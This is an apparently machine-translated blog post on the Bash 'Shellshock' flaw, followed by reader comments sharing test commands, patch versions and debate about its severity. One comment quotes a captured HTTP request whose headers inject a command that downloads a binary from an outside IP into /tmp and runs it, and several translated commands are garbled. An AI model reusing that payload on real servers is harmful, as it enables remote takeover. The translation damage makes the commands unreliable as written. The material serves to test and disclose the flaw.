Bash: Kerentanan baru terdeteksi (dan diperbaiki)

Ini berjalan seperti api di beberapa blog, sebuah cerita diterbitkan di blog keamanan de Red Hat tentang kerentanan yang ditemukan di Bash karena penyalahgunaan variabel global. Menurut berita asli:

“… Kerentanan ini disebabkan oleh fakta bahwa variabel lingkungan dengan nilai yang dibuat secara khusus dapat dibuat sebelum memanggil bash shell. Variabel ini dapat berisi kode yang dijalankan segera setelah shell dipanggil. Nama variabel yang dielaborasi ini tidak masalah, hanya isinya. Akibatnya, kerentanan ini terungkap dalam banyak konteks, misalnya:

  • Perintah Angkatan itu digunakan dalam konfigurasi sshd untuk memberikan kemampuan eksekusi perintah terbatas untuk pengguna jarak jauh. Cacat ini dapat digunakan untuk menghindarinya dan memberikan eksekusi perintah yang sewenang-wenang. Beberapa implementasi Git dan Subversion menggunakan Shell yang dibatasi tersebut. Penggunaan reguler OpenSSH tidak terpengaruh karena pengguna sudah memiliki akses ke konsol.
  • Server Apache yang menggunakan mod_cgi atau mod_cgid terpengaruh jika skrip CGI ditulis dalam bash, atau sublevel spawn. Sublevel seperti itu digunakan secara implisit oleh system / popen di C, oleh os.system / os.popen dengan Python, jika menggunakan shell system / exec di PHP (saat dijalankan dalam mode CGI), dan buka / sistem di Perl (yang bergantung pada string perintah).
  • Skrip PHP yang dijalankan dengan mod_php tidak terpengaruh bahkan jika sublevel dimainkan.
  • Klien DHCP meminta skrip shell untuk mengkonfigurasi sistem, dengan nilai yang diambil dari server yang berpotensi berbahaya. Ini akan memungkinkan perintah arbitrer dijalankan, biasanya sebagai root, pada mesin klien DHCP.
  • Berbagai daemon dan program dengan hak istimewa SUID dapat menjalankan skrip shell dengan nilai variabel lingkungan yang disetel / dipengaruhi oleh pengguna, yang akan memungkinkan perintah arbitrer dijalankan.
  • Aplikasi lain apa pun yang terhubung ke shell atau menjalankan skrip shell seperti menggunakan bash sebagai interpreter. Skrip shell yang tidak mengekspor variabel tidak rentan terhadap masalah ini, meskipun mereka memproses konten yang tidak tepercaya dan menyimpannya di variabel shell (kiri) dan sublevel terbuka.

… »

Bagaimana cara mengetahui apakah bash saya terpengaruh?

Mengingat hal ini, ada cara yang sangat sederhana untuk mengetahui apakah kita terpengaruh oleh kerentanan ini. Faktanya, saya menguji Antergos saya dan ternyata saya tidak punya masalah. Yang harus kita lakukan adalah membuka terminal dan meletakkan:

env x = '() {:;}; echo rentan 'bash -c "echo this is a test"

Jika keluar dengan cara ini kami tidak punya masalah:

env x = '() {:;}; echo rentan 'bash -c "echo ini adalah tes" bash: peringatan: x: mengabaikan upaya definisi fungsi bash: kesalahan mengimpor definisi fungsi untuk `x' ini adalah tes

Jika hasilnya berbeda, Anda mungkin ingin menggunakan saluran pembaruan dari distribusi pilihan kami untuk melihat apakah mereka telah menerapkan tambalan. Jadi, Anda tahu 😉

Diperbarui: Ini adalah keluaran dari rekan kerja yang menggunakan Ubuntu 14:04:

env x = '() {:;}; echo rentan 'bash -c "echo ini adalah tes" rentan ini adalah tes

Seperti yang Anda lihat, sejauh ini rentan.


tinggalkan Komentar Anda

Alamat email Anda tidak akan dipublikasikan. Bidang yang harus diisi ditandai dengan *

*

*

  1. Penanggung jawab data: Miguel Ángel Gatón
  2. Tujuan data: Mengontrol SPAM, manajemen komentar.
  3. Legitimasi: Persetujuan Anda
  4. Komunikasi data: Data tidak akan dikomunikasikan kepada pihak ketiga kecuali dengan kewajiban hukum.
  5. Penyimpanan data: Basis data dihosting oleh Occentus Networks (UE)
  6. Hak: Anda dapat membatasi, memulihkan, dan menghapus informasi Anda kapan saja.

  1.   Gerson dijo

    Saya memiliki Kubuntu 14.04 dari 64 dan saya juga mendapatkan:

    env x = '() {:;}; echo rentan 'bash -c "echo this is a test"
    rentan
    ini adalah sebuah ujian

    Saya sudah memperbarui, tetapi tidak benar. Apa yang harus dilakukan?

    1.    hidup dijo

      Tunggu sampai mereka memperbarui. Sudah eOS misalnya diupdate .. 😀

    2.    John dijo

      Aneh sekali, saya juga punya Kubuntu 14.04

      $ env x = '() {:;}; echo rentan 'bash -c "echo this is a test"
      bash: peringatan: x: upaya mengabaikan definisi fungsi
      bash: kesalahan mengimpor definisi fungsi untuk 'x'
      ini adalah sebuah ujian

      1.    John dijo

        Saya menambahkan bahwa versi paket "bash" yang diunduh hari ini adalah:
        4.3-7ubuntu1.1

        http://packages.ubuntu.com/trusty/bash

    3.    eliotime3000 dijo

      Dalam kasus saya, memberikan perintah, itu hanya memberi saya yang berikut di terminal:

      >

      Bagaimanapun, leluconnya adalah saya memperbarui Debian Wheezy dan itulah yang membuat saya putus.

      1.    yukiteru dijo

        Wheezy masih rentan terhadap bug bagian kedua, setidaknya untuk sore hari (UTC -4: 30) masalahnya masih mengikuti: /

  2.   petercheco.dll dijo

    Saya baru saja memverifikasi bahwa setelah menerapkan pembaruan pagi ini baik Slackware maupun Debian atau Centos tidak terpengaruh karena mereka menerima pembaruan yang sesuai.

    Apa yang membuat Ubuntu masih rentan di jam-jam ini? Dan katakan padaku itu aman: D.

    1.    John dijo

      Tetapi apakah Anda sudah mencoba memperbarui Ubuntu?
      Dengan pembaruan hari ini mereka juga telah memperbaikinya.

      1.    petercheco.dll dijo

        OK

    2.    robet dijo

      Pakar keamanan memperingatkan tentang kerentanan 'Bash', ini bisa menjadi ancaman yang lebih besar bagi pengguna Perangkat Lunak Linux daripada bug Heartbleed, di mana peretas dapat mengeksploitasi bug di Bash untuk mengambil kendali penuh atas sistem.
      Tod Beardsley, seorang manajer teknik di perusahaan keamanan siber Rapid7, memperingatkan bahwa cacat tersebut dinilai 10 untuk tingkat keparahannya, yang berarti memiliki dampak maksimum, dan diberi peringkat "rendah" untuk kompleksitas eksploitasi, yang berarti yang relatif mudah bagi 'peretas' serangan. Dengan menggunakan kerentanan ini, penyerang berpotensi mengambil kendali sistem operasi, mengakses informasi rahasia, membuat perubahan, dll., ”Kata Beardsley. "Siapapun dengan sistem yang menempati Bash harus segera menerapkan tambalan," tambahnya.
      SEBELUM KERENTANAN INI YANG MEMBERIKAN PERANGKAT LAMA (GNU) di mana Bach di-host, akan lebih mudah bagi Perangkat Lunak Linux untuk menyingkirkan GNU dan mengganti alat BSD.

      PS: jangan MENYAMBUT kebebasan berekspresi saya, ... tidak menghina siapa pun, ... jangan hapus pesan saya seperti pesan sebelumnya yang sudah saya hapus!.

      1.    Xerix dijo

        Oh tolong jangan berlebihan. Betapa saya membenci orang-orang yang menggunakan BSD dan membenci GNU, Linux atau apapun dari proyek-proyek ini.

      2.    petercheco.dll dijo

        Saya menyertai Anda dan Anda benar sekali tentang parahnya lubang ini.

      3.    diazepam dijo

        Itu bukan penyensoran, itu redundansi (Anda telah membuat komentar yang sama di posting gnome 3.14)

      4.    Staf dijo

        «... Dan dinilai 'RENDAH' UNTUK KOMPLEKSITAS eksploitasi, yang artinya relatif MUDAH untuk serangan hacker»

        Apakah ketidaksesuaian terlihat?
        Bagaimana cara mudah untuk mengeksploitasi kerentanan dan pada saat yang sama memiliki tingkat risiko yang "rendah" karena sangat rumit untuk digunakan?
        Ini adalah bug yang terpecahkan dalam beberapa jam setelah rapat dan, seperti disayangkan, tidak ada laporan telah dieksploitasi (Tentu saja, yang satu ini memiliki lebih sedikit waktu untuk mengenal satu sama lain).
        Ini lebih merupakan pers tabloid daripada risiko nyata.

      5.    petercheco.dll dijo

        Apakah @Staff tampak tidak penting bagi Anda? Apa yang akan kamu ceritakan sekarang?

        DAPATKAN./.HTTP/1.0
        Agen-Pengguna:. Terima kasih-Rob
        .Cookie: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .Host: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .Perujuk: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .Terima :. * / *

        $file nginx
        nginx: ELF 32-bit LSB dapat dijalankan, Intel 80386, versi 1 (SYSV), ditautkan secara statis, untuk GNU / Linux 2.6.18, dilucuti

        $md5sum nginx
        5924bcc045bb7039f55c6ce29234e29a nginx

        $sha256sum nginx
        73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx

        Tahukah kamu apa itu? Tidak ada yang berbahaya ...

      6.    yukiteru dijo

        Situasinya cukup serius, tapi dari situ untuk mengatakan bahwa Anda harus berhenti menggunakan bash untuk opsi BSD, itu sudah banyak, bagaimanapun juga pembaruannya sudah ada, saya hanya menyentuh pembaruan dan tidak ada yang lain.

        Sekarang PD, saya rasa lebih kolega @robet, saya rasa disini admin tidak berdedikasi untuk menghapus komentar seperti ini karena iya, karena semenjak saya berpartisipasi di komunitas ini saya sudah merasakan perasaan itu dan semoga tetap begitu cara.

        Salam.

      7.    hidup dijo

        Anda memberi komentar yang sama persis di dua postingan berbeda. Jika Anda mencoba mempromosikan "sumber" cerita, maaf, ini bukan tempatnya.

      8.    mario dijo

        Bash berasal dari Unix (dan tiruan GNU-nya). Sistem berbasis BSD seperti OSX juga terpengaruh, dan menurut Genbeta, mereka belum menambalnya. Demikian juga, untuk mengakses Bash Anda memerlukan akun pengguna, baik lokal atau melalui SSH.

      9.    yukiteru dijo

        @Staf:

        1.- Ini diklasifikasikan sebagai Level 10 (tingkat bahaya maksimum) karena jumlah layanan yang dapat terpengaruh oleh bug. Dalam catatan utama mereka membuat fakta itu sangat jelas, dengan alasan bahwa bug dapat mempengaruhi layanan seperti apache, sshd, program dengan izin suid (xorg, antara lain).

        2.- Ini diklasifikasikan sebagai Tingkat Kesulitan Rendah, dalam hal penerapannya, dan contoh terbaik dari ini adalah skrip uji kerentanan yang ditempatkan @elav di pos. Sangat sulit untuk diterapkan tidak, seperti yang Anda lihat.

        Saya tidak melihat redundansi dalam informasi (saya hanya melihat terjemahan Google) dan jika masalahnya cukup serius, dan seperti yang Anda katakan, itu sudah memiliki tambalan dan solusi, tetapi tidak untuk itu, itu tidak lagi berisiko, dan yang cukup nyata.

      10.    Staf dijo

        @petereco / @Yukiteru

        Jangan salah sangka, menurut saya yang jelas kritik saya adalah berita bahwa Robet link dan difokuskan pada ketidaksesuaian dan bukan redundansi.

        Dengan cara yang sama, kita harus membedakan antara risiko dan bahaya (saya tidak menyebutkan yang terakhir), kita biasanya menggunakannya sebagai sinonim, tetapi di sini, bahaya adalah kapasitas kerusakan bug dan risiko kemungkinan kemunculannya.
        Dalam kasus khusus saya, saya masuk dari kemarin. Itu bukan untuk milis atau semacamnya, itu untuk distro desktop! Saya mengangkat telepon dan mengirim pesan ke sysadmin dengan tautannya dan saya mengkonfirmasi bahwa semuanya telah ditambal, lalu maafkan saya tetapi berita ini tidak membuat saya tetap terjaga.

      11.    robet dijo

        Di forum lain mereka menyebutkan tentang kerentanan Bash, "solusi yang dirilis Debian dan Ubuntu", tetapi hari ini mereka menemukan bahwa kerentanan masih ada, jadi solusinya tidak lengkap, mereka menyebutkannya!

        Saya melihat banyak yang mengkritik saya karena fakta sederhana untuk mencegah orang dari keparahan kerentanan -memenuhi syarat dengan tingkat bahaya maksimum 10, dan menyebutkan kemungkinan solusi untuk Perangkat Lunak Linux dalam menghadapi alat GNU yang sudah ketinggalan zaman tempat Bash di-host -yang mana GNU dengan sempurna dapat diganti dengan alat BSD di Perangkat Lunak Linux,… Saya juga menggunakan Linux dan saya suka Linux!

        Saya mengklarifikasi bahwa Bash tidak secara default diinstal di BSD, ini adalah satu lagi paket kompatibilitas Linux yang dapat diinstal di BSD ... ya!. Dan sumbernya diletakkan sehingga mereka dapat memeriksa berita, karena banyak pengguna terkadang tidak percaya pesan atau komentarnya.

        1.    hidup dijo

          robet: Seperti yang mereka katakan berulang kali, Anda sudah memasukkan komentar Anda dengan berita di sebuah posting, Anda tidak perlu meletakkannya di setiap posting yang Anda komentari.

          Tentang bash, ada cangkang lain yang dapat digunakan jika Bash rentan. 😉

      12.    mario dijo

        Robet, setahu saya belum ada software yang menggabungkan kernel linux dengan userland BSD. Hal yang paling dekat adalah sebaliknya, kBSD + GNU, seperti yang dilakukan Gentoo dan Debian. Selain itu, GNU (1983) tidak bisa disebut "kuno" jika setelah BSD (1977). Mereka berdua berbagi root unix mereka (tapi bukan kodenya), tidak akan ada "kompatibilitas Linux" jika Bash dibuat ketika Linus T masih anak-anak.

  3.   manuelperezf.dll dijo

    Uh, pengujian debian saat ini "rentan" betapa beruntunnya kami ...

    1.    mrcelhw.dll dijo

      Saya menggunakan Pengujian Debian dan bahkan di cabang ini kami telah menerima pembaruan bash

  4.   diazepam dijo

    menurut genbeta juga ada kerentanan lain
    http://seclists.org/oss-sec/2014/q3/685

    perintah untuk berkonsultasi adalah
    env X = '() {(a) => \' sh -c "rentan gema"; bash -c "echo Failure 2 belum ditambal"

    1.    hidup dijo
      env X = '() {(a) => \' sh -c "rentan gema"; bash -c "echo Unpatched Failure 2" sh: X: baris 1: kesalahan sintaksis dekat elemen tak terduga `= 'sh: X: baris 1:` `' sh: kesalahan mengimpor definisi fungsi untuk` X 'sh - Rentan - Kegagalan 2 belum ditambal perintah tidak ditemukan
      
      1.    diazepam dijo

        aku yang sama.

      2.    giskard dijo

        Sama disini. Tetapi bug asli di posting telah ditambal di (L) Ubuntu 14.04

      3.    x11tete11x dijo

        Alih-alih melakukan echo sederhana, cobalah membuatnya menjalankan instruksi yang membutuhkan hak istimewa, saya membuang "hak istimewa yang tidak mencukupi" ... bug ini tidak meningkatkan hak istimewa? Jika tidak meningkatkan hak istimewa maka itu tidak seberbahaya mereka melukisnya.

      4.    Xurxo dijo

        Kamu benar!! mereka adalah dua kerentanan ...

        Bagi saya di Linux Mint 17 setelah pembaruan bash kedua yang mereka letakkan di repositori Ubuntu tadi malam, saat menjalankan perintah itu shell menawarkan output ini:

        env X = '() {(a) => \' sh -c "rentan gema"; bash -c "echo Fail 2 belum ditambal"
        >

        Versi "bassh" yang ditempatkan di repositori Ubuntu untuk memperbarui yang sebelumnya adalah:

        4.3-7ubuntu1.2

        Pada sistem turunan Debian Anda dapat memeriksa versi yang diinstal dengan perintah ini:

        dpkg -s bash | grep Version

        Bagaimanapun, itu harus diklarifikasi, setidaknya untuk pengguna Debian, Ubuntu dan Mint; Anda tidak perlu terlalu khawatir dengan program yang menjalankan skrip dengan header #! / Bin / sh karena pada distribusi tersebut / bin / sh tidak memanggil "bash", tetapi mengikat ke shell "dash" (tanda hubung adalah :)

        Konsol Alkemis Debian (tanda hubung) adalah konsol POSIX turunan
        abu.
        .
        Karena itu mengeksekusi skrip lebih cepat dari bash, dan memiliki lebih sedikit ketergantungan
        perpustakaan (membuatnya lebih kuat terhadap kegagalan perangkat lunak atau
        hardware), digunakan sebagai konsol sistem default pada sistem
        Debian.

        Jadi, setidaknya di Ubuntu, "bash" digunakan sebagai shell untuk login pengguna (juga untuk pengguna root). Tetapi setiap pengguna dapat menggunakan shell lain secara default untuk pengguna dan konsol root (terminal).

        Sangat mudah untuk memeriksa apakah shell menjalankan skrip (#! / Bin / sh) dengan menjalankan perintah berikut:

        file / bin / sh
        (outputnya adalah / bin / sh: tautan simbolik ke `tanda hubung ') kita mengikuti jejak yang mengulangi perintah

        file / bin / tanda hubung
        (outputnya adalah / bin / dash: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV) jadi ini adalah executable.

        Ini adalah hasil pada distribusi Linux Mint 17. Pada distribusi berbasis non-Ubuntu / Debian lainnya mungkin berbeda.

        Tidaklah sulit untuk mengubah shell default !! Anda bahkan dapat menggunakan yang berbeda untuk pengguna dan untuk pengguna root. Sebenarnya Anda hanya perlu menginstal shell pilihan Anda dan mengubah default dengan perintah "chsh" atau dengan mengedit file / etc / passwd (meskipun pengguna yang tidak mengetahui konsekuensi kesalahan saat mengedit file "passwd", Lebih baik mereka memberi tahu diri mereka sendiri dengan sangat baik dan sebelum mengeditnya, buat salinan aslinya jika perlu untuk memulihkannya).

        Saya merasa lebih nyaman dengan "tcsh" (tcsh adalah :)

        Konsol TENEX C, versi perbaikan dari Berkeley csh

        "Csh" adalah yang digunakan Mac OS X beberapa tahun lalu. Sesuatu yang logis mengingat sebagian besar sistem operasi Apple adalah kode FreeBSD. Sekarang dari apa yang saya baca kemarin, sepertinya mereka juga menyediakan "bash" untuk terminal pengguna.

        KESIMPULAN:

        - Versi "bash" yang ditambal untuk distribusi yang paling sering digunakan "telah didistribusikan
        - "bash" versi 4.3-7ubuntu1.2 dan yang lebih baru tidak mengandung bug ini
        - Tidak wajib menggunakan "bash" di OS * Linux
        - Beberapa * distribusi Linux memiliki tautan #! / Bin / sh dengan "bash"
        - Ada alternatif: ash, dash, csh, tcsh dan banyak lagi
        - Tidaklah rumit untuk mengubah shell default yang dipanggil oleh sistem saat membuka terminal
        - Beberapa perangkat kecil (router dan lainnya) menggunakan "bash", karena sangat besar !!

      5.    Xurxo dijo

        Saat ini pembaruan lain baru saja tiba yang menginstal versi lain dari "bash" 4.3-7ubuntu1.3

        Untuk Linux Mint 17 dan Ubuntu 14.04.1 LTS

        1.    hidup dijo

          ArchLinux memasuki versi bash-4.3.026-1

    2.    robet dijo

      @ Xurxo… .csh dari Berkeley?,… Anda memahami sesuatu yang saya bicarakan di atas, dan lebih baik menggunakan BSD “csh”… daripada alat GNU lama tempat Bash di-host. Alat itu adalah yang terbaik untuk Perangkat Lunak Linux.

  5.   tidak terkenal dijo
  6.   Gonzalo dijo

    Dan apa solusinya?

    1.    hidup dijo

      Tunggu mereka memperbarui paket di distro Anda 😉

  7.   diazepam dijo

    Serangga itu dibaptis sebagai cangkang
    http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/

  8.   Paul Ivan Correa dijo

    rentan
    ini adalah sebuah ujian

    Belum ada patch untuk Ubuntu Studio 14.04

    1.    Gumpalan dijo

      Diperbaiki di Ubuntu Studio 14.04.1
      wisp @ ubuntustudio: ~ $ env x = '() {:;}; echo rentan 'bash -c "echo this is a test"
      bash: peringatan: x: upaya mengabaikan definisi fungsi
      bash: kesalahan mengimpor definisi fungsi untuk 'x'
      ini adalah sebuah ujian

  9.   pengendara jalan dijo

    Sebenarnya ini adalah kerentanan kecil, jika itu mempengaruhi Anda itu adalah Anda melakukan sesuatu yang salah sebelumnya ...

    Karena skrip bash yang berjalan dengan hak akses root tidak boleh diekspos ke pengguna. Dan jika Anda menjalankan tanpa hak istimewa, tidak ada bulnerabilitas seperti itu. Sebenarnya, itu konyol. Sangat menakutkan.

    1.    Xerix dijo

      Saya juga berpikir sama.

    2.    Staf dijo

      Tepatnya, untuk menjual lebih banyak surat kabar atau mendapatkan lebih banyak kunjungan, bug ini bagus.
      Tetapi mereka selalu lupa menyebutkan bahwa untuk melanggar komputer dengan skrip semacam ini, Anda harus memiliki akses ke bash terlebih dahulu dan kemudian menjadikannya sebagai root.

      1.    dariyo dijo

        staf jika Anda menggunakan apache dengan cgi, cukup masukkan header http sebagai cookie atau referer fungsi yang ingin Anda jalankan. Bahkan telah digunakan untuk menyebarkan cacing.

    3.    dariyo dijo

      dan jika seseorang menempatkan shell ke server dengan wget mishell.php, dalam hal ini tidak serius, bukan?

    4.    eliotime3000 dijo

      Setuju dengan Anda. Saya pikir itu adalah bug besar seperti yang ada di Heartbleed (bahkan NSA meminjamkan dirinya untuk memicu morbiditas), tetapi bagaimanapun itu adalah bug kecil.

      Ada bug lain yang sangat serius seperti konsumsi Flash yang gila-gilaan dan penurunan kinerja di Pepper Flash Player, dan yang telah diperbaiki bug webRTC di Chrome dan Firefox.

  10.   Pengikat dijo

    Tahukah Anda jika itu memiliki pengaturan untuk orang yang memiliki Linux Mint 16?

  11.   oscar dijo

    Dalam pengujian Debian, itu sudah diperbaiki.

  12.   Yoyo dijo

    Di 5 distro saya, ini diselesaikan, di OS X saya, saya tidak tahu.

    Tolong, jangan menyensor komentar saya, saya katakan OS X. Saya tidak tahu apakah Anda bisa mengatakan OS X di situs ini.

    1.    tannhausser.dll dijo

      @yoyo baik jangan terlalu panik bahwa mereka masih mengerjakan beberapa detail tambalan ... coba ini dan kemudian beri tahu saya bagaimana XD

      env x = '() {:;}; 'bash -c' rentan gema "gema Saya lebih rentan daripada iphone 6 sampah"

      Bahwa jika mereka telah menyelesaikannya 100% sebelum OS X, saya bertaruh apa pun

    2.    eliotime3000 dijo

      Yah, bahkan di Ars Technica mereka memberikan relevansi dengan Bash di OSX.

    3.    hidup dijo

      @Yoyo komentar selanjutnya di OS X untuk SPAM .. lla tu simpan .. 😛

  13.   tannhausser.dll dijo

    @yoyo disana perbaiki kutipannya ... tapi selebihnya lho 😉

    1.    eliotime3000 dijo

      Seperti mereka telah menggurui OSX (karena OSX masih menggunakan Bash: v).

      Bagaimanapun, saya tidak perlu terlalu banyak berurusan dengan Debian Jessie.

  14.   elhui2 dijo

    Jika sistem rentan di Cent OS:
    yum bersihkan semua && yum update bash

    untuk melihat versi bash:
    rpm -qa | terima pesta

    Jika versinya lebih lama dari bash-4.1.2-15.el6_5.1, sistem Anda mungkin rentan!

    Salam.

  15.   manuelperezf.dll dijo

    Kerentanan kedua belum teratasi

    env amvariable2 = '() {(a) => \' sh -c "echo amVulnerable"; bash -c "echo Failure 2 belum ditambal"

  16.   Yesus Perales dijo

    Memperbarui ...

  17.   Pengalih dijo

    Hal sebaliknya terjadi pada saya di Gentoo, saya hanya rentan terhadap kegagalan pertama tetapi pada kegagalan kedua saya mendapatkan ini:
    [kode] sh: X: baris 1: kesalahan sintaksis dekat elemen tak terduga '='
    sh: X: baris 1: '' '
    sh: kesalahan mengimpor definisi fungsi untuk 'X'
    sh: rentan: perintah tidak ditemukan
    Bug 2 tidak ditambal
    [/ kode]
    Saya tidak tahu apakah akan ada versi stabil dari Bash dengan bug yang diperbaiki, tapi bagaimanapun juga itu akan tertunda untuk waktu berikutnya saya melakukan emerge –sync && emerge –update –deep –with-bdeps = dan - newuse @world (begitulah langkah saya memperbarui seluruh sistem).

    1.    yukiteru dijo

      Saya memiliki Gentoo dengan versi 4.2_p50 dan sejauh ini telah lulus semua pengujian. Coba jalankan –sync lalu emerge -av1 app-shells / bash, lalu periksa apakah Anda memiliki versi 4.2_p50 menggunakan perintah bash –version.

  18.   Fer dijo

    Sudahkah kamu mencobanya?

    Dan dengan paket baru, tes baru yang diberikan Red Hat kepada kita

    cd / tmp; rm -f / tmp / echo; env 'x = () {(a) => \' bash -c "tanggal gema"; cat / tmp / echo

    Jika sistem kami tidak rentan dan telah ditambal dengan benar, itu harus memberi kami sesuatu seperti ini
    1 tanggal
    2 cat: / tmp / echo: File atau direktori tidak ada

  19.   yukiteru dijo

    Coba cara ini:

    env X = '() {(a) => \' sh -c "rentan gema"; bash -c "echo Kegagalan 2 ditambal"

    saya mendapat

    rentan
    Bug 2 ditambal.

    1.    yukiteru dijo

      Lupakan, baris diformat dengan buruk.

  20.   oscar meza dijo

    Luar biasa! Saya sudah melakukan pembaruan pada Slackware saya, terima kasih!

  21.   lothbrok dijo

    Hai, Saya punya pertanyaan, saya memiliki beberapa server dengan 10 bit "SUSE Linux Enterprise Server 64".
    Ketika saya menjalankan perintah, saya rentan, saya bahkan lebih rentan daripada sampah iPhone 6 xD
    Jika saya tidak salah mengupdate / menginstal paket di SUSE itu dilakukan dengan perintah «zypper».

    Di beberapa server, ini memberi tahu saya ini:

    BIAL: ~ # zypper up
    -bash: zypper: perintah tidak ditemukan
    BIAL: ~ #

    Dan di tempat lain ini:

    SMB: ~ # zypper up
    Memulihkan sumber sistem…
    Mengurai metadata untuk SUSE Linux Enterprise Server 10 SP2-20100319-161944…
    Mengurai database RPM ...
    Ringkasan:
    Tidak ada yang bisa dilakukan.

    Apa yang saya lakukan?
    Saya tahu bahwa beberapa orang mengatakan kerentanan kurang dari apa yang mereka cat tetapi saya memilikinya dan saya tidak ingin terkena risiko, baik kecil atau besar.

    Salam.

  22.   Sanders gutierrez dijo

    Selamat malam, saya sudah mencoba menempelkan kode yang Anda berikan di artikel, saya mengerti
    sanders @ pc-sanders: ~ $ env x = '() {:;}; echo rentan 'bash -c "echo this is a test"
    ini adalah sebuah ujian
    sanders @ pc-sanders: ~ $
    Tolong jelaskan kepada saya cara menambal distro, saya memperbarui setiap hari dan saya tidak melihat perubahan dalam output prompt.

    Terima kasih banyak!